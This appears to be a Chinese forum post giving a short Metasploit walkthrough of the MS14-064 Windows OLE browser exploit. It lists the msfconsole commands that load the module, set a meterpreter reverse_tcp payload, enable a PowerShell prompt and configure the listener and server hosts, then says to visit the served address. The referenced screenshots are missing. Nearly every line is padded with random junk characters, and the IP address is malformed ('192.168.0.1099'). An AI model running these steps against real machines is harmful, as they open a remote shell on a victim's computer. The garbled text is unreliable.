* |8 A2 X, R" o3 V
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
3 d$ j1 b% [ } W' C) ~) p
. S4 ~$ A4 C' {% [. q+ ]2 K% [/ ^4 a3 W
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
9 t- O. [9 T) f5 C
: O6 v, b' \' ]1 |+ @8 |/ O* l2 g6 j$ F% c9 ?
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
9 f! r! T* G7 U" Y$ A
6 L! B/ U- }; f$ s4 h! B9 o
- U! P8 K/ I3 |6 F set AllowPowershellPrompt true
% S) ?( N' }4 a, }- I& d
0 J: v6 ]& Q& F* Y$ t" `- [
8 M% f. F, o8 x# d* l, X
Set LHOST 192.168.0.1099 r* p, ^/ G7 I
h1 C; z$ r) J. t3 a+ \( \! i; h
* d( }+ C' h/ @4 i0 w set SRVHOST 192.168.0.1099 j6 W4 W3 W% i; Y
4 ^- R+ g9 }& S# G/ {" b. L
' m9 J, L. o8 G! p Set uripath share+ r ?% c6 y1 w& Q
3 _9 T; Y4 A! V3 o5 N
2 z9 P' R* s, K2 W) V Set srvport 80& b1 P1 I9 T6 r
4 u. E- h5 j' _
7 c+ Q% F1 b( f2 M( Y* w& j( s / u6 \* w* }) [! P4 z2 I, z6 O) T- v
* H; ?) ~8 S D4 ~3 `- l3 W+ I
" Z% r# W* F, k' f1 I; ?
( L1 j& l2 u7 [! Y, X' c5 x) L
4 P; X- Z. M" P
. y z! F6 q3 F! E6 Q
/ s6 q, [! `/ u6 A3 F0 f m
# A! N# t: z! y% T
- |: g$ l: p! x& b- d" c
9 M' V l" k \/ n4 j0 d9 N- }- m
9 {- E" ?8 F, F8 o3 h3 k2 Q0 H/ I$ b' K( S* N/ H8 j% u
) e3 D0 }+ H3 E
0 ~9 l: R+ d! I4 ]
7 L8 S _! Z0 W" A* T! S 下面我们来访问本地地址如图:6 \ N& t3 W0 t" b
' b& d) p% `7 e
* a2 O( \5 I$ W1 L
0 Z( `4 Q: }" E$ t0 j2 I
5 c& @: F6 a( K$ W" y" V
4 B' G3 ?' K' O9 w U+ Y: Y4 P 9 D+ T( z# f6 j+ z. B
" @ u0 e5 G* R9 C
& f7 P- j3 v# U0 E3 c% P2 {. F
1 g4 X, U1 r, n( o